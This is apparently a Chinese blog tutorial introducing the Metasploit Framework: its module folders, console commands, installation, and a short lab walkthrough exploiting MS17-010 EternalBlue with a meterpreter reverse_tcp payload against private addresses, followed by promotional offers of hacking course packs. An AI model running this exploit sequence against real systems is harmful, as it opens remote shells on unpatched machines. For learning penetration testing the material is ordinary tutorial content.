MSF Metasploit Framework
介绍说明
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布MSF时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为MSF团队一直都在努力开发各种攻击工具,并将它们贡献给所有MSF用户。MSF的设计初衷是打造成一个攻击工具开发平台,然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
目录介绍
1.auxiliary:主要包含渗透测试中一些辅助性脚本,这些脚本功能有扫描,嗅探,破解,注入,漏洞挖掘等。``2.encoders:编码工具,用于躲过入侵检测和过滤系统。``3.exploit:主要包括了 exp、0day、各种漏洞利用的脚本。主要的攻击代码全在这个目录下,这里边包括的 exp 的路径的命名规则是:系统/服务/模块,在使用的exp 是可以根据这个命名方法来找(也可以用 search 这条指令来找)。比如:use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名)``4.nops:由于IDS/IPS会检查数据包中不规则的数据,所以在某些场合下(比如针对溢出攻击),某些特殊的滑行字符串(NOPS x90x90…)会因为被拦截二导致攻击时效,所以此时需要修改exploit中的NOPs.nops文件夹下的东西会在payload生成时用到。如打开php的NOPS生成脚本,就会发现它返回了指定长度的空格。``5.payload:攻击载荷,是攻击者发送给系统执行的指令的。payload主要是在目标机执行的,exploits是在本地执行作用于目标机。命名规则:系统/类型/名称,比如:use payload/windows/shell/bind_tcp``6.post:该目录存放exploits执行成功后,向目标机发送的一些功能性指令,如:提权、获取hash等。``7.evasion:新加入的免杀对抗模块。
**相关命令**
1、msfconsole``2、show exploits:显示所有的攻击模块``3、show auxiliary:显示所有的辅助模块``4、show payloads:显示当前模块可用回连管道``5、show options:显示该模块所需设置的攻击参数``6、show targets:查看模块支持的攻击目标``7、search命令可以用来检索所需要的模块的一些信息``8、use <模块名称> 使用该模块(攻击模块或辅助模块)``9、options:显示需要配置的信息``10、set和unsetset payload<载荷名称>使用该攻击载荷``11、 save 使用save命令对设置的参数进行保存, 在下次启动后可以直接使用``12、 run和exploit 实施攻击``
一、windows安装MSF
windows下载地址:
https://windows.metasploit.com/ /
MSF全部模块都在这个目录下
二、centos7安装MSF
在vps(centos7)安装MSF的时候踩了很多坑,我踩的坑就不让大家踩了,直接按照本文内容安装即可。
官方提供的一键化安装脚本:(推荐)
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
直接一条命令安装即可,网络不好需要多执行几次该命令。
**如何更新到最新版的MSF?**
只能先卸载原来的MSF,然后重新下载安装即可
卸载方法:
rpm -e metasploit-framework
三、简单使用(MS17010)
MS17010利用过程分析:
1.选择攻击模块``2.设置Payload载荷(监听协议)``3.设置攻击模块参数``4.执行run或exploit
可以搜关键词或者CVE编号都是OK的
use exploit/windows/smb/ms17_010_eternalblue //选择攻击模块``set payload windows/x64/meterpreter/reverse_tcp //设置监听协议``set rhost 192.168.46.142 //目标地址``set lhost 192.168.46.131 //本地地址``exploit
`黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
2306
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
